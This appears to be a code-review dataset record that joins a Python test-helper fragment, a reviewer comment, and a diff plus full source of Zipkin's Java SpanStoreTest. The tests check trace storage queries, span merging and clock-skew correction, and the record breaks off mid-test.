assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = "Did not see expected warning of class {}".format(repr(expected_warning.__name__))
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError("Caused unexpected warning(s): {}".format(repr(extra_warnings)))
| 1 | 16,065 | What about we just name it `check_exact`? | databricks-koalas | py |
@@ -205,9 +205,10 @@ public abstract class SpanStoreTest {
}
@Test
- public void getAllServiceNames() {
+ public void getAllServiceNames_mergesAnnotation_andBinaryAnnotation() {
+    // creates a span with mutually exclusive endpoints in binary annotations and annotations
BinaryAnnotation yak = BinaryAnnotation.address("sa", Endpoint.create("yak", 127 << 24 | 1));
- accept(span1.toBuilder().addBinaryAnnotation(yak).build(), span4);
+ accept(span1.toBuilder().binaryAnnotations(asList(yak)).build());
// should be in order
assertThat(store().getServiceNames()).containsExactly("service", "yak"); | 1 | /**
* Copyright 2015-2016 The OpenZipkin Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package zipkin.storage;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Calendar;
import java.util.Collections;
import java.util.GregorianCalendar;
import java.util.List;
import java.util.SortedSet;
import java.util.TimeZone;
import java.util.TreeSet;
import java.util.stream.Collectors;
import java.util.stream.IntStream;
import org.junit.Before;
import org.junit.Test;
import zipkin.Annotation;
import zipkin.BinaryAnnotation;
import zipkin.Endpoint;
import zipkin.Span;
import zipkin.TestObjects;
import zipkin.internal.CallbackCaptor;
import static java.util.Arrays.asList;
import static java.util.Collections.emptyList;
import static java.util.stream.Collectors.toList;
import static org.assertj.core.api.Assertions.assertThat;
import static zipkin.Constants.CLIENT_RECV;
import static zipkin.Constants.CLIENT_SEND;
import static zipkin.Constants.LOCAL_COMPONENT;
import static zipkin.Constants.SERVER_RECV;
import static zipkin.Constants.SERVER_SEND;
import static zipkin.TestObjects.APP_ENDPOINT;
import static zipkin.TestObjects.WEB_ENDPOINT;
/**
* Base test for {@link SpanStore} implementations. Subtypes should create a connection to a real
* backend, even if that backend is in-process.
*
* <p>This is a replacement for {@code com.twitter.zipkin.storage.SpanStoreSpec}.
*/
public abstract class SpanStoreTest {
/** Should maintain state between multiple calls within a test. */
protected abstract StorageComponent storage();
protected SpanStore store() {
return storage().spanStore();
}
/** Blocks until the callback completes to allow read-your-writes consistency during tests. */
protected void accept(Span... spans) {
CallbackCaptor<Void> captor = new CallbackCaptor<>();
storage().asyncSpanConsumer().accept(asList(spans), captor);
captor.get(); // block on result
}
/** Clears store between tests. */
@Before
public abstract void clear() throws IOException;
/** Notably, the cassandra implementation has day granularity */
static long midnight(){
Calendar date = new GregorianCalendar(TimeZone.getTimeZone("GMT"));
// reset hour, minutes, seconds and millis
date.set(Calendar.HOUR_OF_DAY, 0);
date.set(Calendar.MINUTE, 0);
date.set(Calendar.SECOND, 0);
date.set(Calendar.MILLISECOND, 0);
return date.getTimeInMillis();
}
// Use real time, as most span-stores have TTL logic which looks back several days.
long today = midnight();
Endpoint ep = Endpoint.create("service", 127 << 24 | 1);
long spanId = 456;
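  // Shared annotation fixtures: ann1/ann2 carry the standard cs/sr annotations, while
  // ann3-ann8 are "custom" annotations at various offsets from midnight (today).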
Annotation ann1 = Annotation.create((today + 1) * 1000, "cs", ep);
Annotation ann2 = Annotation.create((today + 2) * 1000, "sr", null);
Annotation ann3 = Annotation.create((today + 10) * 1000, "custom", ep);
Annotation ann4 = Annotation.create((today + 20) * 1000, "custom", ep);
Annotation ann5 = Annotation.create((today + 5) * 1000, "custom", ep);
Annotation ann6 = Annotation.create((today + 6) * 1000, "custom", ep);
Annotation ann7 = Annotation.create((today + 7) * 1000, "custom", ep);
Annotation ann8 = Annotation.create((today + 8) * 1000, "custom", ep);
Span span1 = Span.builder()
.traceId(123)
.name("methodcall")
.id(spanId)
.timestamp(ann1.timestamp).duration(9000L)
.annotations(asList(ann1, ann3))
.addBinaryAnnotation(BinaryAnnotation.create("BAH", "BEH", ep)).build();
Span span2 = Span.builder()
.traceId(456)
.name("methodcall")
.id(spanId)
.timestamp(ann2.timestamp)
.addAnnotation(ann2)
.addBinaryAnnotation(BinaryAnnotation.create("BAH2", "BEH2", ep)).build();
Span span3 = Span.builder()
.traceId(789)
.name("methodcall")
.id(spanId)
.timestamp(ann2.timestamp).duration(18000L)
.annotations(asList(ann2, ann3, ann4))
.addBinaryAnnotation(BinaryAnnotation.create("BAH2", "BEH2", ep)).build();
Span span4 = Span.builder()
.traceId(999)
.name("methodcall")
.id(spanId)
.timestamp(ann6.timestamp).duration(1000L)
.annotations(asList(ann6, ann7)).build();
Span span5 = Span.builder()
.traceId(999)
.name("methodcall")
.id(spanId)
.timestamp(ann5.timestamp).duration(3000L)
.annotations(asList(ann5, ann8))
.addBinaryAnnotation(BinaryAnnotation.create("BAH2", "BEH2", ep)).build();
Span spanEmptySpanName = Span.builder()
.traceId(123)
.name("")
.id(spanId)
.parentId(1L)
.timestamp(ann1.timestamp).duration(1000L)
.annotations(asList(ann1, ann2)).build();
Span spanEmptyServiceName = Span.builder()
.traceId(123)
.name("spanname")
.id(spanId).build();
@Test
public void getTrace() {
accept(span1, span2);
assertThat(store().getTrace(span1.traceId)).isEqualTo(asList(span1));
}
@Test
public void getTrace_nullWhenNotFound() {
assertThat(store().getTrace(111111L)).isNull();
}
/**
* Filtered traces are returned in reverse insertion order. This is because the primary search
* interface is a timeline view, looking back from an end timestamp.
*/
@Test
public void tracesRetrieveInOrderDesc() {
accept(span2, span1.toBuilder().annotations(asList(ann3, ann1)).build());
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build()))
.containsOnly(asList(span2), asList(span1));
}
/** Legacy instrumentation will not set timestamp and duration explicitly */
@Test
public void derivesTimestampAndDurationFromAnnotations() {
accept(span1.toBuilder().timestamp(null).duration(null).build());
assertThat(store().getTrace(span1.traceId))
.containsOnly(span1);
}
@Test
public void getSpanNames() {
accept(span1.toBuilder().name("yak").build(), span4);
// should be in order
assertThat(store().getSpanNames("service")).containsExactly("methodcall", "yak");
}
@Test
public void getSpanNames_allReturned() {
// Assure a default spanstore limit isn't hit by assuming if 50 are returned, all are returned
List<String> spanNames = new ArrayList<>();
for (int i = 0; i < 50; i++) {
String suffix = i < 10 ? "0" + i : String.valueOf(i);
accept(span1.toBuilder().id(i).name("yak" + suffix).build());
spanNames.add("yak" + suffix);
}
// should be in order
assertThat(store().getSpanNames("service")).containsOnlyElementsOf(spanNames);
}
@Test
public void getAllServiceNames() {
BinaryAnnotation yak = BinaryAnnotation.address("sa", Endpoint.create("yak", 127 << 24 | 1));
accept(span1.toBuilder().addBinaryAnnotation(yak).build(), span4);
// should be in order
assertThat(store().getServiceNames()).containsExactly("service", "yak");
}
@Test
public void getAllServiceNames__allReturned() {
// Assure a default spanstore limit isn't hit by assuming if 50 are returned, all are returned
List<String> serviceNames = new ArrayList<>();
serviceNames.add("service");
for (int i = 0; i < 50; i++) {
String suffix = i < 10 ? "0" + i : String.valueOf(i);
BinaryAnnotation yak =
BinaryAnnotation.address("sa", Endpoint.create("yak" + suffix, 127 << 24 | 1));
accept(span1.toBuilder().id(i).addBinaryAnnotation(yak).build());
serviceNames.add("yak" + suffix);
}
assertThat(store().getServiceNames()).containsOnlyElementsOf(serviceNames);
}
/**
* This would only happen when the store layer is bootstrapping, or has been purged.
*/
@Test
public void allShouldWorkWhenEmpty() {
QueryRequest.Builder q = QueryRequest.builder().serviceName("service");
assertThat(store().getTraces(q.build())).isEmpty();
assertThat(store().getTraces(q.spanName("methodcall").build())).isEmpty();
assertThat(store().getTraces(q.addAnnotation("custom").build())).isEmpty();
assertThat(store().getTraces(q.addBinaryAnnotation("BAH", "BEH").build())).isEmpty();
}
/**
* This is unlikely and means instrumentation sends empty spans by mistake.
*/
@Test
public void allShouldWorkWhenNoAnnotationsYet() {
accept(spanEmptyServiceName);
QueryRequest.Builder q = QueryRequest.builder().serviceName("service");
assertThat(store().getTraces(q.build())).isEmpty();
assertThat(store().getTraces(q.spanName("methodcall").build())).isEmpty();
assertThat(store().getTraces(q.addAnnotation("custom").build())).isEmpty();
assertThat(store().getTraces(q.addBinaryAnnotation("BAH", "BEH").build())).isEmpty();
}
@Test
public void getTraces_spanName() {
accept(span1);
QueryRequest.Builder q = QueryRequest.builder().serviceName("service");
assertThat(store().getTraces(q.build()))
.containsExactly(asList(span1));
assertThat(store().getTraces(q.spanName("methodcall").build()))
.containsExactly(asList(span1));
assertThat(store().getTraces(q.spanName("badmethod").build())).isEmpty();
assertThat(store().getTraces(q.serviceName("badservice").build())).isEmpty();
assertThat(store().getTraces(q.spanName(null).build())).isEmpty();
}
@Test
public void getTraces_serviceNameInBinaryAnnotation() {
Span localTrace = Span.builder().traceId(1L).name("targz").id(1L)
.timestamp(today * 1000 + 100L).duration(200L)
.addBinaryAnnotation(BinaryAnnotation.create(LOCAL_COMPONENT, "archiver", ep)).build();
accept(localTrace);
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build()))
.containsExactly(asList(localTrace));
}
/**
* Formerly, a bug was present where cassandra didn't index more than bucket count traces per
* millisecond. This stores a lot of spans to ensure indexes work under high-traffic scenarios.
*/
@Test
public void getTraces_manyTraces() {
int traceCount = 1000;
Span span = TestObjects.LOTS_OF_SPANS[0];
BinaryAnnotation b = span.binaryAnnotations.get(0);
accept(Arrays.copyOfRange(TestObjects.LOTS_OF_SPANS, 0, traceCount));
assertThat(store().getTraces(new QueryRequest.Builder().limit(traceCount).build()))
.hasSize(traceCount);
QueryRequest.Builder builder =
QueryRequest.builder().limit(traceCount).serviceName(b.endpoint.serviceName);
assertThat(store().getTraces(builder.build()))
.hasSize(traceCount);
assertThat(store().getTraces(builder.spanName(span.name).build()))
.hasSize(traceCount);
assertThat(store().getTraces(builder.addBinaryAnnotation(b.key, new String(b.value)).build()))
.hasSize(traceCount);
}
/** Shows that duration queries go against the root span, not the child */
@Test
public void getTraces_duration() {
Endpoint service1 = Endpoint.create("service1", 127 << 24 | 1);
Endpoint service2 = Endpoint.create("service2", 127 << 24 | 2);
Endpoint service3 = Endpoint.create("service3", 127 << 24 | 3);
BinaryAnnotation.Builder component = BinaryAnnotation.builder().key(LOCAL_COMPONENT).value("archiver");
BinaryAnnotation archiver1 = component.endpoint(service1).build();
BinaryAnnotation archiver2 = component.endpoint(service2).build();
BinaryAnnotation archiver3 = component.endpoint(service3).build();
Span targz = Span.builder().traceId(1L).id(1L)
.name("targz").timestamp(today * 1000 + 100L).duration(200L).addBinaryAnnotation(archiver1).build();
Span tar = Span.builder().traceId(1L).id(2L).parentId(1L)
.name("tar").timestamp(today * 1000 + 200L).duration(150L).addBinaryAnnotation(archiver2).build();
Span gz = Span.builder().traceId(1L).id(3L).parentId(1L)
.name("gz").timestamp(today * 1000 + 250L).duration(50L).addBinaryAnnotation(archiver3).build();
Span zip = Span.builder().traceId(3L).id(3L)
.name("zip").timestamp(today * 1000 + 130L).duration(50L).addBinaryAnnotation(archiver2).build();
List<Span> trace1 = asList(targz, tar, gz);
List<Span> trace2 = asList(
targz.toBuilder().traceId(2L).timestamp(today * 1000 + 110L).binaryAnnotations(asList(archiver3)).build(),
tar.toBuilder().traceId(2L).timestamp(today * 1000 + 210L).binaryAnnotations(asList(archiver2)).build(),
gz.toBuilder().traceId(2L).timestamp(today * 1000 + 260L).binaryAnnotations(asList(archiver1)).build());
List<Span> trace3 = asList(zip);
accept(trace1.toArray(new Span[0]));
accept(trace2.toArray(new Span[0]));
accept(trace3.toArray(new Span[0]));
long lookback = 12L * 60 * 60 * 1000; // 12hrs, instead of 7days
long endTs = today + 1; // greater than all timestamps above
QueryRequest.Builder q = QueryRequest.builder().serviceName("service1").lookback(lookback).endTs(endTs);
// Min duration is inclusive and is applied by service.
assertThat(store().getTraces(q.serviceName("service1").minDuration(targz.duration).build()))
.containsExactly(trace1);
assertThat(store().getTraces(q.serviceName("service3").minDuration(targz.duration).build()))
.containsExactly(trace2);
// Duration bounds aren't limited to root spans: they apply to all spans by service in a trace
assertThat(store().getTraces(q.serviceName("service2").minDuration(zip.duration).maxDuration(tar.duration).build()))
.containsExactly(trace3, trace2, trace1); // service2 is in the middle of trace1 and 2, but root of trace3
// Span name should apply to the duration filter
assertThat(
store().getTraces(q.serviceName("service2").spanName("zip").maxDuration(zip.duration).build()))
.containsExactly(trace3);
// Max duration should filter our longer spans from the same service
assertThat(store().getTraces(q.serviceName("service2").minDuration(gz.duration).maxDuration(zip.duration).build()))
.containsExactly(trace3);
}
/**
   * Spans and traces are meaningless unless they have a timestamp. While unlikely, this could
* happen if a binary annotation is logged before a timestamped one is.
*/
@Test
public void getTraces_absentWhenNoTimestamp() {
// store the binary annotations
accept(span1.toBuilder().timestamp(null).duration(null).annotations(emptyList()).build());
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build())).isEmpty();
    assertThat(store().getTraces(QueryRequest.builder().serviceName("service").spanName("methodcall").build())).isEmpty();
// now store the timestamped annotations
accept(span1.toBuilder().binaryAnnotations(emptyList()).build());
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build()))
.containsExactly(asList(span1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").spanName("methodcall").build()))
.containsExactly(asList(span1));
}
@Test
public void getTraces_annotation() {
accept(span1);
// fetch by time based annotation, find trace
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").addAnnotation("custom").build()))
.containsExactly(asList(span1));
// should find traces by the key and value annotation
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").addBinaryAnnotation("BAH", "BEH").build()))
.containsExactly(asList(span1));
}
@Test
public void getTraces_multipleAnnotationsBecomeAndFilter() {
Span foo = Span.builder().traceId(1).name("call1").id(1)
.timestamp((today + 1) * 1000)
.addAnnotation(Annotation.create((today + 1) * 1000, "foo", ep)).build();
// would be foo bar, except lexicographically bar precedes foo
Span barAndFoo = Span.builder().traceId(2).name("call2").id(2)
.timestamp((today + 2) * 1000)
.addAnnotation(Annotation.create((today + 2) * 1000, "bar", ep))
.addAnnotation(Annotation.create((today + 2) * 1000, "foo", ep)).build();
Span fooAndBazAndQux = Span.builder().traceId(3).name("call3").id(3)
.timestamp((today + 3) * 1000)
.addAnnotation(Annotation.create((today + 3) * 1000, "foo", ep))
.addBinaryAnnotation(BinaryAnnotation.create("baz", "qux", ep))
.build();
Span barAndFooAndBazAndQux = Span.builder().traceId(4).name("call4").id(4)
.timestamp((today + 4) * 1000)
.addAnnotation(Annotation.create((today + 4) * 1000, "bar", ep))
.addAnnotation(Annotation.create((today + 4) * 1000, "foo", ep))
.addBinaryAnnotation(BinaryAnnotation.create("baz", "qux", ep))
.build();
accept(foo, barAndFoo, fooAndBazAndQux, barAndFooAndBazAndQux);
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").addAnnotation("foo").build()))
.containsExactly(asList(barAndFooAndBazAndQux), asList(fooAndBazAndQux), asList(barAndFoo), asList(foo));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").addAnnotation("foo").addAnnotation("bar").build()))
.containsExactly(asList(barAndFooAndBazAndQux), asList(barAndFoo));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").addAnnotation("foo").addAnnotation("bar").addBinaryAnnotation("baz", "qux").build()))
.containsExactly(asList(barAndFooAndBazAndQux));
}
/**
* This test makes sure that annotation queries pay attention to which host logged an annotation.
*/
@Test
public void getTraces_differentiateOnServiceName() {
Span trace1 = Span.builder().traceId(1).name("get").id(1)
.timestamp((today + 1) * 1000)
.addAnnotation(Annotation.create((today + 1) * 1000, CLIENT_SEND, WEB_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, SERVER_RECV, APP_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, SERVER_SEND, APP_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, CLIENT_RECV, WEB_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, "web", WEB_ENDPOINT))
.addBinaryAnnotation(BinaryAnnotation.create("local", "web", WEB_ENDPOINT))
.addBinaryAnnotation(BinaryAnnotation.create("web-b", "web", WEB_ENDPOINT))
.build();
Span trace2 = Span.builder().traceId(2).name("get").id(2)
.timestamp((today + 2) * 1000)
.addAnnotation(Annotation.create((today + 1) * 1000, CLIENT_SEND, APP_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, SERVER_RECV, WEB_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, SERVER_SEND, WEB_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, CLIENT_RECV, APP_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, "app", APP_ENDPOINT))
.addBinaryAnnotation(BinaryAnnotation.create("local", "app", APP_ENDPOINT))
.addBinaryAnnotation(BinaryAnnotation.create("app-b", "app", APP_ENDPOINT))
.build();
accept(trace1, trace2);
assertThat(store().getTraces(QueryRequest.builder().build()))
.containsExactly(asList(trace2), asList(trace1));
// We only return traces where the service specified caused the annotation queried.
assertThat(store().getTraces(QueryRequest.builder().serviceName("web").addAnnotation("web").build()))
.containsExactly(asList(trace1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("app").addAnnotation("web").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("app").addAnnotation("app").build()))
.containsExactly(asList(trace2));
assertThat(store().getTraces(QueryRequest.builder().serviceName("web").addAnnotation("app").build()))
.isEmpty();
// Binary annotations are not returned for annotation queries
assertThat(store().getTraces(QueryRequest.builder().serviceName("web").addAnnotation("web-b").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("app").addAnnotation("web-b").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("app").addAnnotation("app-b").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("web").addAnnotation("app-b").build()))
.isEmpty();
// We only return traces where the service specified caused the binary value queried.
assertThat(store().getTraces(QueryRequest.builder().serviceName("web")
.addBinaryAnnotation("local", "web").build()))
.containsExactly(asList(trace1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("app")
.addBinaryAnnotation("local", "web").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("app")
.addBinaryAnnotation("local", "app").build()))
.containsExactly(asList(trace2));
assertThat(store().getTraces(QueryRequest.builder().serviceName("web")
.addBinaryAnnotation("local", "app").build()))
.isEmpty();
}
/** Make sure empty binary annotation values don't crash */
@Test
public void getTraces_binaryAnnotationWithEmptyValue() {
Span span = Span.builder()
.traceId(1)
.name("call1")
.id(1)
.timestamp((today + 1) * 1000)
.addBinaryAnnotation(BinaryAnnotation.create("empty", "", ep)).build();
accept(span);
assertThat(store().getTraces((QueryRequest.builder().serviceName("service").build())))
.containsExactly(asList(span));
assertThat(store().getTrace(1L))
.containsExactly(span);
}
/**
* It is expected that [[com.twitter.zipkin.storage.SpanStore.apply]] will receive the same span
* id multiple times with different annotations. At query time, these must be merged.
*/
@Test
public void getTraces_mergesSpans() {
accept(span1, span4, span5); // span4, span5 have the same span id
SortedSet<Annotation> mergedAnnotations = new TreeSet<>(span4.annotations);
mergedAnnotations.addAll(span5.annotations);
Span merged = span4.toBuilder()
.timestamp(mergedAnnotations.first().timestamp)
.duration(mergedAnnotations.last().timestamp - mergedAnnotations.first().timestamp)
.annotations(mergedAnnotations)
.binaryAnnotations(span5.binaryAnnotations).build();
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build()))
.containsExactly(asList(merged), asList(span1));
}
/** limit should apply to traces closest to endTs */
@Test
public void getTraces_limit() {
accept(span1, span3); // span1's timestamp is 1000, span3's timestamp is 2000
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").limit(1).build()))
.containsExactly(asList(span3));
}
/** Traces whose root span has timestamps before or at endTs are returned */
@Test
public void getTraces_endTsAndLookback() {
accept(span1, span3); // span1's timestamp is 1000, span3's timestamp is 2000
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 1L).build()))
.containsExactly(asList(span1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 2L).build()))
.containsExactly(asList(span3), asList(span1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 3L).build()))
.containsExactly(asList(span3), asList(span1));
}
/** Traces whose root span has timestamps between (endTs - lookback) and endTs are returned */
@Test
public void getTraces_lookback() {
accept(span1, span3); // span1's timestamp is 1000, span3's timestamp is 2000
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 1L).lookback(1L).build()))
.containsExactly(asList(span1));
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 2L).lookback(1L).build()))
.containsExactly(asList(span3), asList(span1));
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 3L).lookback(1L).build()))
.containsExactly(asList(span3));
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 3L).lookback(2L).build()))
.containsExactly(asList(span3), asList(span1));
}
@Test
public void getAllServiceNames_emptyServiceName() {
accept(spanEmptyServiceName);
assertThat(store().getServiceNames()).isEmpty();
}
@Test
public void getSpanNames_emptySpanName() {
accept(spanEmptySpanName);
assertThat(store().getSpanNames(spanEmptySpanName.name)).isEmpty();
}
@Test
public void spanNamesGoLowercase() {
accept(span1);
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").spanName("MeThOdCaLl").build()))
.containsOnly(asList(span1));
}
@Test
public void serviceNamesGoLowercase() {
accept(span1);
assertThat(store().getSpanNames("SeRvIcE")).containsExactly("methodcall");
assertThat(store().getTraces(QueryRequest.builder().serviceName("SeRvIcE").build()))
.containsOnly(asList(span1));
}
/**
* Basic clock skew correction is something span stores should support, until the UI supports
* happens-before without using timestamps. The easiest clock skew to correct is where a child
* appears to happen before the parent.
*
* <p>It doesn't matter if clock-skew correction happens at store or query time, as long as it
* occurs by the time results are returned.
*
   * <p>Span stores that don't support this can override and disable this test, noting the
   * limitation in the README.
*/
@Test
public void correctsClockSkew() {
Endpoint client = Endpoint.create("client", 192 << 24 | 168 << 16 | 1);
Endpoint frontend = Endpoint.create("frontend", 192 << 24 | 168 << 16 | 2);
Endpoint backend = Endpoint.create("backend", 192 << 24 | 168 << 16 | 3);
/** Intentionally not setting span.timestamp, duration */
Span parent = Span.builder()
.traceId(1)
.name("method1")
.id(666)
.addAnnotation(Annotation.create((today + 100) * 1000, CLIENT_SEND, client))
.addAnnotation(Annotation.create((today + 95) * 1000, SERVER_RECV, frontend)) // before client sends
.addAnnotation(Annotation.create((today + 120) * 1000, SERVER_SEND, frontend)) // before client receives
.addAnnotation(Annotation.create((today + 135) * 1000, CLIENT_RECV, client)).build();
/** Intentionally not setting span.timestamp, duration */
Span remoteChild = Span.builder()
.traceId(1)
.name("method2")
.id(777)
.parentId(666L)
.addAnnotation(Annotation.create((today + 100) * 1000, CLIENT_SEND, frontend))
.addAnnotation(Annotation.create((today + 115) * 1000, SERVER_RECV, backend))
.addAnnotation(Annotation.create((today + 120) * 1000, SERVER_SEND, backend))
.addAnnotation(Annotation.create((today + 115) * 1000, CLIENT_RECV, frontend)) // before server sent
.build();
/** Local spans must explicitly set timestamp */
Span localChild = Span.builder()
.traceId(1)
.name("local")
.id(778)
.parentId(666L)
.timestamp((today + 101) * 1000).duration(50L)
.addBinaryAnnotation(BinaryAnnotation.create(LOCAL_COMPONENT, "framey", frontend)).build();
List<Span> skewed = asList(parent, remoteChild, localChild);
// There's clock skew when the child doesn't happen after the parent
assertThat(skewed.get(0).annotations.get(0).timestamp)
.isLessThanOrEqualTo(skewed.get(1).annotations.get(0).timestamp)
.isLessThanOrEqualTo(skewed.get(2).timestamp); // local span
// Regardless of when clock skew is corrected, it should be corrected before traces return
accept(parent, remoteChild, localChild);
List<Span> adjusted = store().getTrace(1L);
// After correction, the child happens after the parent
assertThat(adjusted.get(0).timestamp)
        .isLessThanOrEqualTo(adjusted.get(1).timestamp);
// After correction, children happen after their parent
assertThat(adjusted.get(0).timestamp)
.isLessThanOrEqualTo(adjusted.get(1).timestamp)
.isLessThanOrEqualTo(adjusted.get(2).timestamp);
// And we do not change the parent (client) duration, due to skew in the child (server)
assertThat(adjusted.get(0).duration).isEqualTo(clientDuration(skewed.get(0)));
assertThat(adjusted.get(1).duration).isEqualTo(clientDuration(skewed.get(1)));
assertThat(adjusted.get(2).duration).isEqualTo(skewed.get(2).duration);
}
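  // Editor's note: a hypothetical helper, not part of the original test, sketching the simplest
  // correction the Javadoc above describes. If a child's SERVER_RECV appears to happen before its
  // parent's CLIENT_SEND, the child's clock is behind by at least that difference.
  private static long naiveSkewOffset(long parentClientSendTs, long childServerRecvTs) {
    // A positive result is how far the child's timestamps would need to shift forward so the
    // child no longer appears to start before its parent.
    return childServerRecvTs < parentClientSendTs ? parentClientSendTs - childServerRecvTs : 0L;
  }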
/**
* This test shows that regardless of whether span.timestamp and duration are set directly or
* derived from annotations, the client wins vs the server. This is important because the client
* holds the critical path of a shared span.
*/
@Test
public void clientTimestampAndDurationWinInSharedSpan() {
Endpoint client = Endpoint.create("client", 192 << 24 | 168 << 16 | 1);
Endpoint server = Endpoint.create("server", 192 << 24 | 168 << 16 | 2);
long clientTimestamp = (today + 100) * 1000;
long clientDuration = 35 * 1000;
// both client and server set span.timestamp, duration
Span clientView = Span.builder().traceId(1).name("direct").id(666)
.timestamp(clientTimestamp).duration(clientDuration)
.addAnnotation(Annotation.create((today + 100) * 1000, CLIENT_SEND, client))
.addAnnotation(Annotation.create((today + 135) * 1000, CLIENT_RECV, client))
.build();
Span serverView = Span.builder().traceId(1).name("direct").id(666)
.timestamp((today + 105) * 1000).duration(25 * 1000L)
.addAnnotation(Annotation.create((today + 105) * 1000, SERVER_RECV, server))
.addAnnotation(Annotation.create((today + 130) * 1000, SERVER_SEND, server))
.build();
// neither client, nor server set span.timestamp, duration
Span clientViewDerived = Span.builder().traceId(1).name("derived").id(666)
.addAnnotation(Annotation.create(clientTimestamp, CLIENT_SEND, client))
.addAnnotation(Annotation.create(clientTimestamp + clientDuration, CLIENT_SEND, client))
.build();
Span serverViewDerived = Span.builder().traceId(1).name("derived").id(666)
.addAnnotation(Annotation.create((today + 105) * 1000, SERVER_RECV, server))
.addAnnotation(Annotation.create((today + 130) * 1000, SERVER_SEND, server))
.build();
accept(serverView, serverViewDerived); // server span hits the collection tier first
accept(clientView, clientViewDerived); // intentionally different collection event
for (Span span : store().getTrace(clientView.traceId)) {
assertThat(span.timestamp).isEqualTo(clientTimestamp);
assertThat(span.duration).isEqualTo(clientDuration);
}
}
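  // Editor's note: a hypothetical helper, not part of the original test, restating the
  // "client wins" rule from the Javadoc above: when both sides of a shared span report a
  // timestamp, the client's value is kept because the client holds the critical path.
  private static Long sharedSpanTimestamp(Long clientTimestamp, Long serverTimestamp) {
    return clientTimestamp != null ? clientTimestamp : serverTimestamp;
  }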
// Bugs have happened in the past where trace limit was mistaken for span count.
@Test
public void traceWithManySpans() {
Span[] trace = new Span[101];
trace[0] = TestObjects.TRACE.get(0);
IntStream.range(0, 100).forEach(i -> {
Span s = TestObjects.TRACE.get(1);
trace[i + 1] = s.toBuilder()
.id(s.id + i)
.timestamp(s.timestamp + i)
.annotations(s.annotations.stream()
.map(a -> Annotation.create(a.timestamp + i, a.value, a.endpoint))
.collect(toList()))
.build();
});
accept(trace);
String serviceName = trace[1].annotations.get(0).endpoint.serviceName;
assertThat(store().getTraces(QueryRequest.builder().serviceName(serviceName).build()))
.containsExactly(asList(trace));
assertThat(store().getTrace(trace[0].traceId))
.containsExactly(trace);
assertThat(store().getRawTrace(trace[0].traceId))
.containsAll(asList(trace)); // order isn't guaranteed in raw trace
}
/**
* Spans report depth-first. Make sure the client timestamp is preferred when instrumentation
   * doesn't add a timestamp.
*/
@Test
public void whenSpanTimestampIsMissingClientSendIsPreferred() {
Endpoint frontend = Endpoint.create("frontend", 192 << 24 | 168 << 16 | 2);
Annotation cs = Annotation.create((today + 50) * 1000, CLIENT_SEND, frontend);
Annotation cr = Annotation.create((today + 150) * 1000, CLIENT_RECV, frontend);
Endpoint backend = Endpoint.create("backend", 192 << 24 | 168 << 16 | 2);
Annotation sr = Annotation.create((today + 95) * 1000, SERVER_RECV, backend);
Annotation ss = Annotation.create((today + 100) * 1000, SERVER_SEND, backend);
Span span = Span.builder().traceId(1).name("method1").id(666).build();
// Simulate the server-side of a shared span arriving first
accept(span.toBuilder().addAnnotation(sr).addAnnotation(ss).build());
accept(span.toBuilder().addAnnotation(cs).addAnnotation(cr).build());
// Make sure that the client's timestamp won
assertThat(store().getTrace(span.traceId))
.containsExactly(span.toBuilder()
.timestamp(cs.timestamp)
.duration(cr.timestamp - cs.timestamp)
.annotations(asList(cs, sr, ss, cr)).build());
}
// This supports the "raw trace" feature, which skips application-level data cleaning
@Test
public void rawTrace_doesntPerformQueryTimeAdjustment() {
Endpoint producer = Endpoint.create("producer", 192 << 24 | 168 << 16 | 1);
Annotation ms = Annotation.create((today + 95) * 1000, "ms", producer);
Endpoint consumer = Endpoint.create("consumer", 192 << 24 | 168 << 16 | 2);
Annotation mr = Annotation.create((today + 100) * 1000, "mr", consumer);
Span span = Span.builder().traceId(1).name("message").id(666).build();
// Simulate instrumentation that sends annotations one at-a-time.
